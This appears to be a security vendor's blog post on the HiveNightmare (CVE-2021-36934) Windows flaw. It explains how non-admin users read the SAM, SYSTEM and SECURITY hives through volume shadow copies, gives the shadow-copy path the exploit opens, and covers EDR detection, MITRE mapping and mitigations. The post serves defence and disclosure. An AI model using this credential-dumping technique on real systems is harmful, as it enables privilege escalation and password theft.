HiveNightmare aka #SeriousSAM is a vulnerability (CVE-2021-36934) in Windows 10 and above (including Windows 11) that can be easily exploited by local non-admin users to gain admin privileges.
An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. An attacker must have the ability to execute code on a victim system to exploit this vulnerability.
A hive is a logical group of keys, subkeys, and values in the Windows Registry — effectively acting as a home for hashed passwords, application and network settings, system decryption keys and more. The SAM, SECURITY, SYSTEM, and other sensitive registry files, are stored in the folder %SystemRoot%\System32\Config\.
The Security Account Manager (SAM) is a database file that stores hashed copies of user passwords.
The Security hive stores security information for the local system, including user rights and permissions, password policies and group membership.
The System hive stores the keys to further encrypt the hashes in the SAM.
The bug in Windows 10 and later allows a local non-admin user to read the sensitive registry hives and thus access and dump the passwords of users in the SAM, SYSTEM, and SECURITY hives.According to the default permissions shown below, the Users group has read access to the SAM file.
Despite the fact that SAM file permissions allow read access, sensitive hives are locked and cannot be moved or copied while Windows is running. To get around this, the exploit code provided below used CreateFile to gain access to the device through Volume shadow copies (VSC), which are commonly used in recovery scenarios.
The ‘fullpath’ passed to the CreateFile is ‘\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\\Windows\\System32\\config\\SAM’. The Volume Shadow Copy Service, which is included with Windows, can create backup copies or snapshots of computer files or volumes while they are in use. As a result, even when Windows is running, the SAM is accessible through the VSC.
When the exploit HiveNightMare.exe runs, it copies the SAM, SYSTEM, and SECURITY hives to the working directory, making them accessible to the local non-admin user.
After successfully dumping user credentials from the SAM, SYSTEM, and SECURITY hives, the non-admin user can elevate privileges and run arbitrary code with SYSTEM rights.
Detecting and blocking HiveNightMare with FortiEDR:
FortiEDR's advanced real-time detection triggered the following event when the malicious process "HiveNightMare.exe" attempted to access credentials to elevate privileges, as shown in the event below.
This was triggered by the following EDR rules under the exfiltration prevention policy.
The FortiEDR v5 threat hunting can be used to examine the activity of the malicious process 'HiveNightMare.exe'. The type ‘File Write' highlights the sensitive hives that are copied and written to the working directory.
The image below is from one of the file write operations and shows the process HieNightMare.exe running as the local user and creating a copy of the SAM hive in the working directory.
The following is a summary of the MITRE techniques associated with this exploit, as well as the recommended mitigation strategies:
TA0004: Privilege Escalation
Valid Accounts: Local Accounts
Adversary obtain credentials of a local account and abuse it to elevate privileges and harvest credentials through OS Credential Dumping.
· Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
· Audit local accounts permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.
TA0006: Credential Access
OS Credential Dumping: Security Account Manager
Adversary attempting to extract credential material from the Security Account Manager (SAM) database file
· Limit credential overlap across accounts and systems.
· Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled.
You must restrict access and delete shadow copies to prevent exploitation of this vulnerability.
Restrict access to the contents of %windir%\system32\config
Delete Volume Shadow Copy Service (VSS) shadow copies
1. Delete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\system32\config.
2. Create a new System Restore point (if desired).
Impact of workaround Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications. For more information on how to delete shadow copies, see KB5005357- Delete Volume Shadow Copies.
The FortiGuard Managed Detection and Response (MDR) Service is designed for customers of the FortiEDR advanced endpoint security platform. This team of threat experts monitors, reviews and analyzes every alert, proactively hunts threats, and takes actions on behalf of customers to ensure they are protected according to their risk profile.